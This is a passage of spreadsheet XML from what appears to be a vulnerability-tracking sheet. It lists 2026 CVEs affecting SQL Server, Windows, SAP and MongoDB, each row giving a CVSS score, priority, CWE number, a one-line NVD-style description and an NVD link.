          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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5" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022</t>
        </is>
      </c>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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8" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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0" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="S71"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T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S72"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T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S73"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T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67378</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67379</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67636</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S77"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T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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8" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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0" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
